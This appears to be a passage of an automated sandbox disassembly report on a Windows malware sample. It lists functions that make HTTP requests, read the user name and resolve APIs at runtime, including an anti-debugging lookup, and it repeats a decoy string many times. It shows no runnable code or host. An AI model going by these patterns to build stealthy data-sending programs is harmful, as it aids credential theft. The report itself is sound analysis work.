                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404707
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046A7
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471D
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040467D
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404728
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404693
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046BD
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047CB
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404784
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047B5
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404779
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C8
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404712
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040479F
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040476E
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040478F
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404667
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047C0
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047AA
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404688
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D3
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046FC
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404763
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404672
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                              • API String ID: 2127927946-2218711628
                                              • Opcode ID: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
                                              • Instruction ID: 994efd3a0b10ceab7f5143b43c992d696de16e9dedea517f3aaaefbefb2e1973
                                              • Opcode Fuzzy Hash: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
                                              • Instruction Fuzzy Hash: F0413F79740624ABD7109FE5FC4DADCBF70AB4C702BA08061F90A99190C7F993859B7D
                                              Function 004048D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 769 4048d0-404992 call 41aab0 call 404800 call 41aa50 * 5 InternetOpenA StrCmpCA 784 404994 769->784 785 40499b-40499f 769->785 784->785 786 4049a5-404b1d call 418cf0 call 41ac30 call 41abb0 call 41ab10 * 2 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41ac30 call 41abb0 call 41ab10 * 2 InternetConnectA 785->786 787 404f1b-404f43 InternetCloseHandle call 41ade0 call 40a210 785->787 786->787 873 404b23-404b27 786->873 797 404f82-404ff2 call 418b20 * 2 call 41aab0 call 41ab10 * 8 787->797 798 404f45-404f7d call 41ab30 call 41acc0 call 41abb0 call 41ab10 787->798 798->797 874 404b35 873->874 875 404b29-404b33 873->875 876 404b3f-404b72 HttpOpenRequestA 874->876 875->876 877 404b78-404e78 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41aa50 call 41ac30 * 2 call 41abb0 call 41ab10 * 2 call 41ade0 lstrlenA call 41ade0 * 2 lstrlenA call 41ade0 HttpSendRequestA 876->877 878 404f0e-404f15 InternetCloseHandle 876->878 989 404e82-404eac InternetReadFile 877->989 878->787 990 404eb7-404f09 InternetCloseHandle call 41ab10 989->990 991 404eae-404eb5 989->991 990->878 991->990 992 404eb9-404ef7 call 41acc0 call 41abb0 call 41ab10 991->992 992->989
                                              APIs
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404965
                                              • StrCmpCA.SHLWAPI(?,02C9ED80), ref: 0040498A
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404B0A
                                              • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDE,00000000,?,?,00000000,?,",00000000,?,02CA7288), ref: 00404E38
                                              • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E54
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E68
                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E99
                                              • InternetCloseHandle.WININET(00000000), ref: 00404EFD
                                              • InternetCloseHandle.WININET(00000000), ref: 00404F15
                                              • HttpOpenRequestA.WININET(00000000,02CA7328,?,02CA65B8,00000000,00000000,00400100,00000000), ref: 00404B65
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • InternetCloseHandle.WININET(00000000), ref: 00404F1F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                              • String ID: "$"$------$------$------
                                              • API String ID: 2402878923-2180234286
                                              • Opcode ID: 927139e4ff79dcccf89a947fe60bb3502d149b71191b8262adec89c01fc198ea
                                              • Instruction ID: 9047d27655e640063cf5e546897bb6ee72beef818384a457e6eae52f2661673c
                                              • Opcode Fuzzy Hash: 927139e4ff79dcccf89a947fe60bb3502d149b71191b8262adec89c01fc198ea
                                              • Instruction Fuzzy Hash: 41121072A121189ACB14EB91DD66FEEB379AF14314F50419EF10662091EF383F98CF69
                                              Function 004179E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocNameProcessUser
                                              • String ID:
                                              • API String ID: 1206570057-0
                                              • Opcode ID: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
                                              • Instruction ID: 9b82aaaa51ecd1631f431d3f1c3dae0ecd6dc6cababe86b84151973db8bb3773
                                              • Opcode Fuzzy Hash: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
                                              • Instruction Fuzzy Hash: 80F04FB1D49249EBC700DF98DD45BAEBBB8EB45711F10021BF615A2680D7755640CBA1
                                              Function 00401160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
                                              • ExitProcess.KERNEL32 ref: 0040117E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitInfoProcessSystem
                                              • String ID:
                                              • API String ID: 752954902-0
                                              • Opcode ID: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
                                              • Instruction ID: 7de8415141d8ede1392e5156f4839a36e98c975bb62c62673ce2cce929d499c4
                                              • Opcode Fuzzy Hash: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
                                              • Instruction Fuzzy Hash: 9ED05E74D0530DABCB04DFE09D496DDBB79BB0C315F041656DD0572240EA305441CA66
                                              Function 00419BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 665 419bb0-419bc4 call 419aa0 668 419de3-419e42 LoadLibraryA * 5 665->668 669 419bca-419dde call 419ad0 GetProcAddress * 21 665->669 670 419e44-419e58 GetProcAddress 668->670 671 419e5d-419e64 668->671 669->668 670->671 674 419e96-419e9d 671->674 675 419e66-419e91 GetProcAddress * 2 671->675 676 419eb8-419ebf 674->676 677 419e9f-419eb3 GetProcAddress 674->677 675->674 678 419ec1-419ed4 GetProcAddress 676->678 679 419ed9-419ee0 676->679 677->676 678->679 680 419f11-419f12 679->680 681 419ee2-419f0c GetProcAddress * 2 679->681 681->680
                                              APIs
                                              • GetProcAddress.KERNEL32(75900000,02C227A8), ref: 00419BF1
                                              • GetProcAddress.KERNEL32(75900000,02C22970), ref: 00419C0A
                                              • GetProcAddress.KERNEL32(75900000,02C229D0), ref: 00419C22
                                              • GetProcAddress.KERNEL32(75900000,02C22988), ref: 00419C3A
                                              • GetProcAddress.KERNEL32(75900000,02C229A0), ref: 00419C53
                                              • GetProcAddress.KERNEL32(75900000,02C9D518), ref: 00419C6B
                                              • GetProcAddress.KERNEL32(75900000,02C9CBC0), ref: 00419C83
                                              • GetProcAddress.KERNEL32(75900000,02C9CA80), ref: 00419C9C
                                              • GetProcAddress.KERNEL32(75900000,02C22A00), ref: 00419CB4
                                              • GetProcAddress.KERNEL32(75900000,02C229E8), ref: 00419CCC
                                              • GetProcAddress.KERNEL32(75900000,02C22940), ref: 00419CE5
                                              • GetProcAddress.KERNEL32(75900000,02C229B8), ref: 00419CFD
                                              • GetProcAddress.KERNEL32(75900000,02C9CA20), ref: 00419D15
                                              • GetProcAddress.KERNEL32(75900000,02C22958), ref: 00419D2E
                                              • GetProcAddress.KERNEL32(75900000,02C9E920), ref: 00419D46
                                              • GetProcAddress.KERNEL32(75900000,02C9C9A0), ref: 00419D5E
                                              • GetProcAddress.KERNEL32(75900000,02C9EA58), ref: 00419D77
                                              • GetProcAddress.KERNEL32(75900000,02C9E998), ref: 00419D8F
                                              • GetProcAddress.KERNEL32(75900000,02C9CB00), ref: 00419DA7
                                              • GetProcAddress.KERNEL32(75900000,02C9EAA0), ref: 00419DC0
                                              • GetProcAddress.KERNEL32(75900000,02C9CAA0), ref: 00419DD8
                                              • LoadLibraryA.KERNEL32(02C9E968,?,00416CA0), ref: 00419DEA
                                              • LoadLibraryA.KERNEL32(02C9E890,?,00416CA0), ref: 00419DFB
                                              • LoadLibraryA.KERNEL32(02C9E9B0,?,00416CA0), ref: 00419E0D
                                              • LoadLibraryA.KERNEL32(02C9EAB8,?,00416CA0), ref: 00419E1F
                                              • LoadLibraryA.KERNEL32(02C9E8F0,?,00416CA0), ref: 00419E30
                                              • GetProcAddress.KERNEL32(75070000,02C9EA40), ref: 00419E52
                                              • GetProcAddress.KERNEL32(75FD0000,02C9E848), ref: 00419E73
                                              • GetProcAddress.KERNEL32(75FD0000,02C9E7E8), ref: 00419E8B
                                              • GetProcAddress.KERNEL32(75A50000,02C9E878), ref: 00419EAD
                                              • GetProcAddress.KERNEL32(74E50000,02C9CC20), ref: 00419ECE
                                              • GetProcAddress.KERNEL32(76E80000,02C9D578), ref: 00419EEF
                                              • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00419F06
                                              Strings
                                              • NtQueryInformationProcess, xrefs: 00419EFA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$LibraryLoad
                                              • String ID: NtQueryInformationProcess
                                              • API String ID: 2238633743-2781105232
                                              • Opcode ID: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                              • Instruction ID: 85c76ffc39373860cb8090e471c59d53cf6ad49422061259caa86ebb7f60cad9
                                              • Opcode Fuzzy Hash: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                              • Instruction Fuzzy Hash: 4DA16FB5D0A2549FC344DFA8FC889567BBBA74D301708A61BF909C3674E734AA40CF62
                                              Function 004062D0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 191networkfileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1001 4062d0-40635b call 41aab0 call 404800 call 41aa50 InternetOpenA StrCmpCA 1008 406364-406368 1001->1008 1009 40635d 1001->1009 1010 406559-406575 call 41aab0 call 41ab10 * 2 1008->1010 1011 40636e-406392 InternetConnectA 1008->1011 1009->1008 1030 406578-40657d 1010->1030 1012 406398-40639c 1011->1012 1013 40654f-406553 InternetCloseHandle 1011->1013 1015 4063aa 1012->1015 1016 40639e-4063a8 1012->1016 1013->1010 1018 4063b4-4063e2 HttpOpenRequestA 1015->1018 1016->1018 1020 406545-406549 InternetCloseHandle 1018->1020 1021 4063e8-4063ec 1018->1021 1020->1013 1023 406415-406455 HttpSendRequestA HttpQueryInfoA 1021->1023 1024 4063ee-40640f InternetSetOptionA 1021->1024 1026 406457-406477 call 41aa50 call 41ab10 * 2 1023->1026 1027 40647c-40649b call 418ad0 1023->1027 1024->1023 1026->1030 1034 406519-406539 call 41aa50 call 41ab10 * 2 1027->1034 1035 40649d-4064a4 1027->1035 1034->1030 1037 4064a6-4064d0 InternetReadFile 1035->1037 1038 406517-40653f InternetCloseHandle 1035->1038 1041 4064d2-4064d9 1037->1041 1042 4064db 1037->1042 1038->1020 1041->1042 1047 4064dd-406515 call 41acc0 call 41abb0 call 41ab10 1041->1047 1042->1038 1047->1037
                                              APIs
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                              • StrCmpCA.SHLWAPI(?,02C9ED80), ref: 00406353
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                              • HttpOpenRequestA.WININET(00000000,GET,?,02CA65B8,00000000,00000000,00400100,00000000), ref: 004063D5
                                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0040644D
                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064BD
                                              • InternetCloseHandle.WININET(00000000), ref: 0040653F
                                              • InternetCloseHandle.WININET(00000000), ref: 00406549
                                              • InternetCloseHandle.WININET(00000000), ref: 00406553
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                              • String ID: ERROR$ERROR$FUA$GET
                                              • API String ID: 3074848878-1334267432
                                              • Opcode ID: f3f7255e0d2dc24356a6d92e3ef249651165f71d209c9760ff987d984a1e72ad
                                              • Instruction ID: e13f8b4f5a4983f25bfc964ce73e77e76ffbf3c7ad5d81db2c216f4c68459c1c
                                              • Opcode Fuzzy Hash: f3f7255e0d2dc24356a6d92e3ef249651165f71d209c9760ff987d984a1e72ad
                                              • Instruction Fuzzy Hash: 33718171A00218ABDB14DF90DC59FEEB775AF44304F1081AAF6067B1D4DBB86A84CF59
                                              Function 004119F0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160stringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
